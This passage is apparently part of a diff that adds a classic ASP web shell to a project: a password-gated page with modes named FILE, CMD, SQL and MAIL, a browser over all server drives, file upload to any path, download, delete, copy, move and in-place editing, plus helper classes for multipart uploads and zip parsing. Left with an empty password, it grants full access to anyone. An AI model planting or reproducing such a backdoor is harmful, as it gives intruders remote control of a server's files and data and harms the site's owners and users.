+<td><input type=checkbox name=allbox title="Select All" onclick="CheckAll()"><input type=button value=Delete title="Delete Selected Item(s)" onclick="DoWork('Delete')"></td>
+</tr>
+<%
+end if
+%>
+</table>
+<%
+if count>1 then
+%>
+<p>
+<table>
+<tr><td><b>C</b>opy selected item(s) to</td><td><input type=text name=cp value="<%=Session("cp_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.cp_bt.click();"> <input type=button id=cp_bt value=Copy onclick="DoWork('Copy')"></td></tr>
+<tr><td><b>M</b>ove selected item(s) to</td><td><input type=text name=mv value="<%=Session("mv_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.mv_bt.click();"> <input type="button" id=mv_bt value=Move onclick="DoWork('Move')"></td></tr>
+</table>
+<%
+end if
+%>
+</form>
+</table>
+<%
+end if
+set objFolder=nothing
+%>
+<p><b>U</b>pload file(s) to "<%=targetPath%>"
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=gURL%>">
+<input type=hidden name=folder value="<%=targetPath%>">
+Max: <input type=text name=max value=5 size=5> <input type=button value=# onclick="setid()"><br>
+<table>
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload>
+</form>
+<script>
+setid();
+function setid() {
+str='<br>';
+if (frmUpload.max.value<=0) frmUpload.max.value=1;
+for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end if
+%>
+<form name=frmFile method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=param value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+</form>
+<script>frmAddress.param.focus()</script>
+<%
+HtmlJsCommand()
+end sub
+
+'###########################################################################################
+
+sub Upload()
+dim objUpload,f,max,i,name,path,size,success
+
+HtmlHeader("")
+HtmlMode()
+
+set objUpload=New clsUpload
+
+targetPath=objUpload.Fields("folder").Value
+max=objUpload.Fields("max").Value
+
+gMsg= "<b>U</b>pload..." & vbNewLine
+
+for i=1 to max
+name=objUpload.Fields("file" & i).FileName
+size=objUpload.Fields("file" & i).Length
+if (name<>"") and (size>0) then
+gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+path=addslash(targetPath) & name
+objUpload.Fields("file" & i).SaveAs path
+if FSO.FileExists(path) then
+on error resume next
+set f=FSO.GetFile(path)
+if IsObject(f) then
+if f.Size=size then success=true else success=false
+end if
+set f=nothing
+end if
+if success then gMsg=gMsg & "success" else gMsg = gMsg & "fail"
+end if
+next
+
+set objUpload=nothing
+
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Download()
+dim oStream
+dim szFileName
+szFileName=addslash(Request.Form("folder")) & Request.form("Param")
+if FSO.FileExists(szFileName) then
+set oStream=Server.CreateObject("ADODB.Stream")
+oStream.Type=1
+oStream.Open
+on error resume next
+oStream.LoadFromFile(szFileName)
+if Err.Number=0 then
+Response.AddHeader "Content-Disposition", "attachment; filename=" & FSO.GetFileName(szFileName)
+Response.AddHeader "Content-Length", oStream.Size
+Response.ContentType="bad/type" 'yeu cau ie hien hop thoai save-as
+Response.BinaryWrite oStream.Read
+end if
+oStream.Close
+set oStream=nothing
+end if
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Logout()
+Session.Abandon
+Response.Redirect gURL
+Destroy()
+end sub
+
+sub Init()
+Session("switch")=false
+set FSO=Server.CreateObject("Scripting.FileSystemObject")
+set re=new regexp
+end sub
+
+sub Destroy()
+set FSO=nothing
+set re=nothing
+Response.End
+end sub
+
+'###########################################################################################
+
+sub Secure()
+if (Session("allow")=1) then exit sub
+if (gPassword="") then
+Session("allow")=1
+Session("mode")=0
+exit sub
+end if
+if (Request.Form("command")="Login") then
+if Request.Form("password")=gPassword then
+Session("allow")=1
+Session("mode")=CInt(Request.Form("mode"))
+exit sub
+end if
+end if
+
+HtmlHeader("")
+%>
+<form name=frmLogin method=post action="<%=gURL%>">
+<table>
+<tr>
+<td><b>M</b>ode:</td>
+<td>
+<select name=mode>
+<option value=0 selected>FILE
+<option value=1>CMD
+<option value=2>SQL
+<option value=3>MAIL
+</select>
+</td>
+</tr>
+<tr>
+<td><b>P</b>assword:</td>
+<td><input type=password name=password></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=command value=Login></td>
+</tr>
+</table>
+</form>
+<script>frmLogin.password.focus()</script>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub HtmlJsForm()
+%>
+<script>
+function CheckAll() {
+var fmobj=document.theForm;
+for (var i=0; i<fmobj.elements.length;i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (!e.disabled)) {
+e.checked=fmobj.allbox.checked;
+}
+}
+if (fmobj.allbox.checked) {
+fmobj.allbox.title='Clear All';
+} else {
+fmobj.allbox.title='Select All';
+}
+}
+
+function DoWork(cmd) {
+var s;
+var fmobj=document.theForm;
+var total=0;
+for (var i=0; i<fmobj.elements.length; i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (e.checked)) total++;
+}
+
+if (total<1) return;
+
+s=(total>1)?'s':'';
+
+switch (cmd) {
+case "Delete":
+if (!confirm('Are you sure to delete ' + total + ' selected item' + s + ' ?')) return;
+break;
+case "Move":
+var mv=fmobj.mv.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (mv=='') return;
+if ( re1.test(mv) || re2.test(mv) ){
+if (!confirm('Are you sure to move ' + total + ' selected item' + s + ' to "' + mv + '" ?')) return;
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "Copy":
+var cp=fmobj.cp.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (cp=='') return;
+if ( re1.test(cp) || re2.test(cp) ) {
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+default:
+return;
+}
+
+fmobj.command.value=cmd;
+fmobj.submit();
+}
+</script>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlJsCommand()
+%>
+<script>
+function openWin(winName, urlLoc, w, h, showStatus, isViewer) {
+l = (screen.availWidth - w)/2;
+t = (screen.availHeight - h)/2;
+features = "toolbar=no"; // yes|no 
+features += ",location=no"; // yes|no 
+features += ",directories=no"; // yes|no 
+features += ",status=" + (showStatus?"yes":"no"); // yes|no 
+features += ",menubar=no"; // yes|no 
+features += ",scrollbars=" + (isViewer?"yes":"no"); // auto|yes|no 
+features += ",resizable=" + (isViewer?"yes":"no"); // yes|no 
+features += ",dependent"; // close the parent, close the popup, omit if you want otherwise 
+features += ",height=" + h;
+features += ",width=" + w;
+features += ",left=" + l;
+features += ",top=" + t;
+winName = winName.replace(/[^a-z]/gi,"_");
+return window.open(urlLoc,winName,features);
+} 
+
+function createPage (theWin, cmd, param){
+frmFile.target = theWin.name;
+frmFile.command.value = cmd;
+frmFile.param.value = param;
+frmFile.submit();
+}
+
+function CheckName(str) {
+var re;
+re = /[\\/:*?"<>|]/gi;
+if (re.test(str)) return false; 
+else return true;
+} 
+
+function Command(cmd, param) {
+var str;
+var someWin;
+switch (cmd) {
+case "Tree":
+str = prompt("Please enter a name for the folder to tree", frmFile.folder.value);
+if (!str) return;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (re1.test(str) || re2.test(str)) {
+var winName=cmd + document.forms.frmFile.param.value;
+param=str;
+document.forms.frmFile.param.value=param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+}
+else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "NewFile":
+str = prompt("Please enter a name for the new file", "New File");
+if(!str) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "NewFolder":
+str = prompt("Please enter a name for the new folder", "New Folder");
+if(!str) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "RenameFile":
+str = prompt("Please enter the new name for the file", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "RenameFolder":
+str = prompt("Please enter the new name for the folder", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "Edit":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 600, 440, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ChangeAttributesFile":
+case "ChangeAttributesFolder":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 300, 160, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ZipInfo":
+var winName=cmd + document.forms.frmFile.folder.value + param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break
+default:
+frmFile.param.value = param;
+}
+frmFile.target = "";
+frmFile.command.value = cmd
+frmFile.submit(); 
+}
+</script>
+<%
+end sub
+
+sub HtmlJsEditor()
+%>
+<script>
+function EditorCommand (cmd) {
+switch (cmd) {
+case "WordWrap":
+if (frmFile.wrap.checked) frmFile.content.wrap="soft";
+else frmFile.content.wrap="off";
+frmFile.content.focus();
+break;
+case "Reload":
+frmFile.reset();
+break;
+case "Save":
+frmFile.subcommand.value = "Save";
+frmFile.submit();
+break;
+case "SaveAs":
+var str, oldname;
+oldname = frmFile.param.value;
+str = prompt("Save the file as :", oldname);
+if (!str || str==oldname) return;
+frmFile.param.value = str;
+frmFile.subcommand.value = "SaveAs";
+frmFile.submit();
+break;
+}
+}
+</script>
+<%
+end sub
+
+sub HtmlQuick()
+%>
+<form name=frmQuick method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<select name=param onchange="frmQuick.submit()">
+<%
+dim dc,d,dName,dType
+set dc=FSO.Drives
+for each d in dc
+dName=d.DriveLetter&":\"
+select case d.DriveType
+case 0 dType="Unknown"
+case 1 if d.driveletter="A" then dType="?" else dType="?"
+dType=dType&" Floppy" 'maybe wrong
+case 2 dType="HDD " & FormatSize(d.TotalSize)
+case 3 dType="Network"
+case 4
+dType="CD-ROM"
+if not d.IsReady then dType=dType & " - not ready"
+case 5
+dType="RAM Disk"
+end select
+Response.Write "<option value=""" & dName & """"
+if d.DriveLetter=Ucase(Left(targetPath,1)) then Response.Write " selected"
+Response.Write ">" & dName& " (" & dType & ")" & vbNewLine
+next
+set dc=nothing
+%>
+</select>
+</form>
+<form name=frmAddress method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<b>A</b>ddress: <input type=text name=param value="<%=targetPath%>" size=90> <input type=submit value=Go>
+</form>
+<%
+end sub
+
+sub HtmlMode()
+%>
+<table>
+<tr>
+<td>
+<form name=frmChangeMode method=post action="<%=gURL%>">
+<input type=hidden name=command value=ChangeMode>
+<select name=mode onchange="frmChangeMode.submit()">
+<option value=0<%if Session("mode")=0 then Response.Write " selected"%>>FILE
+<option value=1<%if Session("mode")=1 then Response.Write " selected"%>>CMD
+<option value=2<%if Session("mode")=2 then Response.Write " selected"%>>SQL
+<option value=3<%if Session("mode")=3 then Response.Write " selected"%>>MAIL
+</select>
+</form>
+</td>
+<%
+if gPassword<>"" then
+%>
+<td>
+<form name=frmLogout method=post action="<%=gURL%>">
+<input type=submit name=command value=Logout>
+</form>
+</td>
+<%
+end if
+%>
+</tr>
+</table>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlHeader(strTitle)
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=strTitle%></title>
+<style>
+select,input{font-family:Verdana;font-size:9pt}
+</style>
+</head>
+<body>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlFooter()
+%>
+</body>
+</html>
+<%
+end sub
+
+'###########################################################################################
+
+function abspath(path)
+if left(path,1)=":" then abspath=Server.MapPath(mid(path,2)) else abspath=FSO.GetAbsolutePathName(path)
+end function
+
+'###########################################################################################
+
+function addslash(path)
+if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+'###########################################################################################
+
+function findroot(path)
+dim f
+
+set f=FSO.GetFolder(path)
+
+if f.IsRootFolder then
+else
+do until f.IsRootFolder
+set f=f.ParentFolder
+loop
+end if
+findroot=f.Path
+set f=nothing
+end function
+
+'###########################################################################################
+
+function isroot(path)
+dim f
+set f=FSO.GetFolder(path)
+isroot=f.IsRootFolder
+set f=nothing
+end function
+
+'###########################################################################################
+
+Function FindLink(szFileName)
+Dim WshShell, oLink
+
+Set WshShell=Server.CreateObject("WScript.Shell")
+Set oLink=WshShell.CreateShortcut(szFileName)
+
+FindLink=oLink.TargetPath
+
+Set oLink=Nothing
+Set WshShell=Nothing
+End Function
+
+'###########################################################################################
+
+Function FormatSize(intSize)
+If (intSize < 1024) Then
+FormatSize = intSize & " B"
+ElseIf (intSize < 1024*1024) Then
+FormatSize = FormatNumber(intSize/1024,2) & " KB"
+ElseIf (intSize < 1024*1024*1024) Then
+FormatSize = FormatNumber(intSize/(1024*1024),2) & " MB"
+Else
+FormatSize = FormatNumber(intSize/(1024*1024*1024),2) & " GB"
+End If
+End Function
+
+'###########################################################################################
+
+Function FormatName(szName)
+FormatName = szName
+If gMax > 5 And Len(szName) > gMax Then FormatName = Left(szName,gMax-2) & "..."
+End Function
+
+'###########################################################################################
+
+function FormatDate(strDate)
+dim int12HourPart,strAMPM
+int12HourPart=DatePart("h",strDate) mod 12
+if int12HourPart=0 then int12HourPart=12
+if DatePart("h",strDate)>=12 then strAMPM="PM" else strAMPM="AM"
+FormatDate=Right("0"&DatePart("d",strDate),2) & "/" & Right("0"&DatePart("m",strDate),2) & "/" & DatePart("yyyy",strDate) & " " & Right("0"&int12HourPart,2) & ":" & Right("0"&DatePart("n",strDate),2) & ":" & Right("0"&DatePart("s",strDate),2) & " " & strAMPM
+end function
+
+'###########################################################################################
+
+Function GetAttributes(intAttr)
+Dim strAttributes
+strAttributes=""
+If (intAttr And 1) > 0 Then strAttributes = "R"
+If (intAttr And 2) > 0 Then strAttributes=strAttributes & "H"
+If (intAttr And 4) > 0 Then strAttributes=strAttributes & "S"
+If (intAttr And 32) > 0 Then strAttributes=strAttributes & "A"
+If (intAttr And 2048) > 0 Then strAttributes=strAttributes & "C"
+if strAttributes="" then strAttributes=" "
+GetAttributes=strAttributes
+End Function
+
+'###########################################################################################
+
+Class clsField
+Public Name
+Private mstrPath
+Public FileDir
+Public FileExt
+Public FileName
+Public ContentType
+Public Value
+Public BinaryData
+Public Length
+Private mstrText
+
+Public Property Get BLOB()
+BLOB = BinaryData
+End Property
+
+Public Function BinaryAsText()
+Dim lbinBytes
+Dim lobjRs
+If Length = 0 Then Exit Function
+If LenB(BinaryData) = 0 Then Exit Function
+
+If Not Len(mstrText) = 0 Then
+BinaryAsText = mstrText
+Exit Function
+End If
+lbinBytes = ASCII2Bytes(BinaryData)
+mstrText = Bytes2Unicode(lbinBytes)
+BinaryAsText = mstrText
+End Function
+
+Public Sub SaveAs(ByRef pstrFileName)
+Const adTypeBinary=1
+Const adSaveCreateOverWrite=2
+Dim lobjStream
+Dim lobjRs
+Dim lbinBytes
+If Length = 0 Then Exit Sub
+If LenB(BinaryData) = 0 Then Exit Sub
+Set lobjStream = Server.CreateObject("ADODB.Stream")
+lobjStream.Type = adTypeBinary
+Call lobjStream.Open()
+lbinBytes = ASCII2Bytes(BinaryData)
+Call lobjStream.Write(lbinBytes)
+On Error Resume Next
+Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+Call lobjStream.Close()
+Set lobjStream = Nothing
+End Sub
+
+Public Property Let FilePath(ByRef pstrPath)
+mstrPath = pstrPath
+If Not InStrRev(pstrPath, ".") = 0 Then
+FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+FileExt = UCase(FileExt)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+End If
+End Property
+
+Public Property Get FilePath()
+FilePath = mstrPath
+End Property
+
+Private Function ASCII2Bytes(ByRef pbinBinaryData)
+Const adLongVarBinary=205
+Dim lobjRs
+Dim llngLength
+Dim lbinBuffer
+llngLength = LenB(pbinBinaryData)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+Call lobjRs.Update()
+lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+Call lobjRs.Close()
+Set lobjRs = Nothing
+ASCII2Bytes = lbinBuffer
+End Function
+
+Private Function Bytes2Unicode(ByRef pbinBytes)
+Dim lobjRs
+Dim llngLength
+Dim lstrBuffer
+llngLength = LenB(pbinBytes)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+Call lobjRs.Update()
+lstrBuffer = lobjRs.Fields("BinaryData").Value
+Call lobjRs.Close()
+Set lobjRs = Nothing
+Bytes2Unicode = lstrBuffer
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsUpload
+Private mbinData
+Private mlngChunkIndex
+Private mlngBytesReceived
+Private mstrDelimiter
+Private CR
+Private LF
+Private CRLF
+Private mobjFieldAry()
+Private mlngCount
+
+Private Sub RequestData
+Dim llngLength
+mlngBytesReceived = Request.TotalBytes
+mbinData = Request.BinaryRead(mlngBytesReceived)
+End Sub
+
+Private Sub ParseDelimiter()
+mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+End Sub
+
+Private Sub ParseData()
+Dim llngStart
+Dim llngLength
+Dim llngEnd
+Dim lbinChunk
+llngStart = 1
+llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+While Not llngStart = 0
+llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+llngLength = llngEnd - llngStart
+lbinChunk = MidB(mbinData, llngStart, llngLength)
+Call ParseChunk(lbinChunk)
+llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+Wend
+End Sub
+
+Private Sub ParseChunk(ByRef pbinChunk)
+Dim lstrName
+Dim lstrFileName
+Dim lstrContentType
+Dim lbinData
+Dim lstrDisposition
+Dim lstrValue
+lstrDisposition = ParseDisposition(pbinChunk)
+lstrName = ParseName(lstrDisposition)
+lstrFileName = ParseFileName(lstrDisposition)
+lstrContentType = ParseContentType(pbinChunk)
+If lstrContentType = "" Then
+lstrValue = CStrU(ParseBinaryData(pbinChunk))
+Else
+lbinData = ParseBinaryData(pbinChunk)
+End If
+Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+End Sub
+
+Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+Dim lobjField
+ReDim Preserve mobjFieldAry(mlngCount)
+Set lobjField = New clsField
+lobjField.Name = pstrName
+lobjField.FilePath = pstrFileName 
+lobjField.ContentType = pstrContentType
+If LenB(pbinData) = 0 Then
+lobjField.BinaryData = ChrB(0)
+lobjField.Value = pstrValue
+lobjField.Length = Len(pstrValue)
+Else
+lobjField.BinaryData = pbinData
+lobjField.Length = LenB(pbinData)
+lobjField.Value = ""
+End If
+Set mobjFieldAry(mlngCount) = lobjField
+mlngCount = mlngCount + 1
+End Sub
+
+Private Function ParseBinaryData(ByRef pbinChunk)
+Dim llngStart
+llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+If llngStart = 0 Then Exit Function
+llngStart = llngStart + 4
+ParseBinaryData = MidB(pbinChunk, llngStart)
+End Function
+
+Private Function ParseContentType(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 15
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+End Function
+
+Private Function ParseDisposition(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 22
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+End Function
+
+Private Function ParseName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 6
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+' ------------------------------------------------------------------------------
+Private Function ParseFileName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 10
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+
+Public Property Get Count()
+Count = mlngCount
+End Property
+
+Public Default Property Get Fields(ByVal pstrName)
+Dim llngIndex
+If IsNumeric(pstrName) Then
+llngIndex = CLng(pstrName)
+If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+Exit Property
+End If
+Set Fields = mobjFieldAry(pstrName)
+Else
+pstrName = LCase(pstrname)
+For llngIndex = 0 To mlngCount - 1
+If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+Set Fields = mobjFieldAry(llngIndex)
+Exit Property
+End If
+Next
+End If
+Set Fields = New clsField
+End Property
+
+Private Sub Class_Terminate()
+Dim llngIndex
+For llngIndex = 0 To mlngCount - 1
+Set mobjFieldAry(llngIndex) = Nothing
+
+Next
+ReDim mobjFieldAry(-1)
+End Sub
+
+Private Sub Class_Initialize()
+ReDim mobjFieldAry(-1)
+CR = ChrB(Asc(vbCr))
+LF = ChrB(Asc(vbLf))
+CRLF = CR & LF
+mlngCount = 0
+Call RequestData
+Call ParseDelimiter()
+Call ParseData
+End Sub
+
+Private Function CStrU(ByRef pstrANSI)
+Dim llngLength
+Dim llngIndex
+llngLength = LenB(pstrANSI)
+For llngIndex = 1 To llngLength
+CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+Next
+End Function
+
+Private Function CStrB(ByRef pstrUnicode)
+Dim llngLength
+Dim llngIndex
+llngLength = Len(pstrUnicode)
+For llngIndex = 1 To llngLength
+CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+Next
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsZip
+Private mbin_Zip
+Private mobj_Files()
+Private mlng_Files
+
+Sub ZipLoad(pstrFileName)
+Dim lobjFSO
+Dim llngTristateFalse
+Dim llngForReading
+dim objStream
+
+mbin_Zip = ""
+
+If pstrFileName = "" Then Exit Sub
+
+If InStr(1, pstrFileName, ":\") = 0 Then
+pstrFileName = Server.MapPath(pstrFileName)
+End If
+
+Set lobjFSO = Server.CreateObject("Scripting.FileSystemObject")
+
+If lobjFSO.FileExists(pstrFileName) Then
+set objStream=Server.CreateObject("ADODB.Stream")
+objStream.Type=1
+objStream.Open
+on error resume next
+objStream.LoadFromFile(pstrFileName)
+mbin_Zip = objStream.Read
+set objStream=nothing
+End If
+
+Set lobjFSO = Nothing
+
+Call ParseZips()
+
+End Sub
+
+Public Property Let ZipData(ByRef pbinBinaryData)
+mbin_Zip = pbinBinaryData
+Call ParseZips()
+End Property
+Public Property Get FileCount()
+FileCount = mlng_Files
+End Property
+Public Property Get GetFile(ByRef plngIndex)
+Set GetFile = mobj_Files(plngIndex-1)
+End Property
+
+Private Sub ParseZips()
+Dim llngOffSet
+mlng_Files = 0
+llngOffSet = 0
+If LenB(mbin_Zip) = 0 Then Exit Sub
+Do
+' Find next PK 3.04 record
+llngOffset = InStrB(llngOffset + 1, mbin_zip, ChrB(&h50) & ChrB(&h4B) & ChrB(&h03) & ChrB(&h04))
+If llngOffset = 0 Then Exit Do
+llngOffset = llngOffset - 1
+ReDim Preserve mobj_Files(mlng_Files)
+Set mobj_Files(mlng_Files) = New clsZipFile
+With mobj_Files(mlng_Files)
+.Signature = GetString(llngOffset + 1, 2) & " " & CInt(GetHex(llngOffset + 3, 1)) & "." & GetHex(llngOffset + 4, 1)
+.ExtractVersion = FormatNumber(GetNumber(llngOffset + 5, 2) * .1, 1, True)
+.GeneralPurposeFlags = GetNumber(llngOffset + 7, 2)
+.CompressionMethod = GetNumber(llngOffset + 9, 2)
+.LastModifiedTime = GetNumber(llngOffset + 11, 2)
+.LastModifiedDate = GetNumber(llngOffset + 13, 2)
+.CRC32 = GetNumber(llngOffset + 15, 4)
+.CompressedSize = GetNumber(llngOffset + 19, 4)
+.UncompressedSize = GetNumber(llngOffset + 23, 4)
+.FileNameLength = GetNumber(llngOffset + 27, 2)
+.ExtraFieldLength = GetNumber(llngOffset + 29, 2)
+.FileName = GetString(llngOffset + 31, .FileNameLength)
+.ExtraField = GetString(llngOffset + 31 + .FileNameLength, .ExtraFieldLength)
+.StartByte = llngOffSet + 1
+.EndByte = llngOffSET + .FileNameLength + .ExtraFieldLength + .CompressedSize + 30
+' .BinaryData = MidB(pbin_Zip, llngOffSET + .FileNameLength + .ExtraFieldLength + 30, .CompressedSize)
+' .LocalFileHeader = GetString(llngOffset + 1, .FileNameLength + .ExtraFieldLength + 30)
+llngOffSet = .EndByte
+.IsOverall = (.Name = "" And .Path = "")
+.IsFolder = (.Name = "" And Not .Path = "")
+End With
+mlng_Files = mlng_Files + 1
+Loop While mobj_Files(mlng_Files - 1).EndByte < LenB(mbin_zip)
+End Sub
+
+Private Function GetHex(plngStart, plngLength)
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = lstrHex & Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2)
+Next
+GetHex = lstrHex
+End Function
+
+Private Function GetString(plngStart, plngLength)
+Dim llngIndex
+Dim lstrString
+If LenB(mbin_zip) < (plngStart + (plngLength - 1)) Then Exit Function
+For llngIndex = 0 To plngLength - 1
+If AscB(MidB(mbin_zip, plngStart + llngIndex, 1)) = 0 Then
+lstrString = lstrString & " "
+Else
+lstrString = lstrString & Chr(AscB(MidB(mbin_zip, plngStart + llngIndex, 1)))
+End If
+Next
+GetString = lstrString
+End Function
+
+Private Function GetNumber(plngStart, plngLength)
+If plngStart < 0 Then Exit Function
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2) & lstrHex
+Next
+GetNumber = CDbl("&h" & lstrHex)
+End Function
+
+Function GetDate(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetDate = DateSerial(1980 + (llngDate And &HFE00) \ &H200, (llngDate And &H1E0) \ &H20, llngDate And &H1F)
+End Function
+
+Function GetTime(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetTime = TimeSerial((llngDate And &HF800) \ &H800, (llngDate And &H7E0) \ &H20, (llngDate And &H1F) * 2)
+End Function
+End Class
+
+Class clsZipFile
+Public Signature
+Public ExtractVersion
+Public GeneralPurposeFlags
+Public CompressionMethod
+Public LastModifiedTime
+Public LastModifiedDate
+Public CRC32
+Public CompressedSize
+Public UncompressedSize
+Public FileNameLength
+Public ExtraFieldLength
+Public FileName
+Public ExtraField
+Public StartByte
+Public EndByte
+Public BinaryData
+Public LocalFileHeader
+
+Public IsFolder
+Public IsOverall
+
+Public Property Get Name
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
